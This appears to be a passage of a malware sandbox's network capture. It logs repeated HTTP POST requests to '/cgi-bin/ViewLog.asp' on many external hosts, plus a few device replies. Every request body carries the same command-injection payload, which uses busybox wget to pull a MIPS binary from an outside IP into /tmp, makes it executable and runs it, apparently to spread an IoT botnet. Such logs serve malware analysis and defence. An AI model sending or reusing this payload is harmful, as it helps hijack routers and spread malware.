                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:31.591922998 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.047074080 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:29.957429886 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              42192.168.2.145488085.122.216.2508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:12.602444887 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              43192.168.2.144224031.136.210.558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:12.768995047 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:13.352644920 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:14.472754955 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:16.744503021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:21.352288008 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:30.311961889 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:48.999228954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:25.861579895 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              44192.168.2.144993831.136.207.2158080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:12.769797087 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:13.352726936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:14.504714966 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:17.000489950 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:21.608350039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:30.823971033 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:48.999191999 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:25.861593008 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              45192.168.2.143601694.62.181.2108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:12.796487093 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:12.996800900 CET430INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:15:10 GMT
                                              Server: DNVRS-Webs
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              46192.168.2.143543694.120.247.1398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:12.993799925 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              47192.168.2.143576485.95.152.1128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:13.085427999 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:13.402084112 CET328INHTTP/1.0 200 OK
                                              Server: httpd/2.0
                                              x-frame-options: SAMEORIGIN
                                              x-xss-protection: 1; mode=block
                                              Date: Thu, 23 Nov 2023 04:20:04 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              48192.168.2.1439532120.53.4.9623
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:13.530292988 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 34 3a 35 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:14:56Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              49192.168.2.1439584120.53.4.9623
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:14.214848995 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
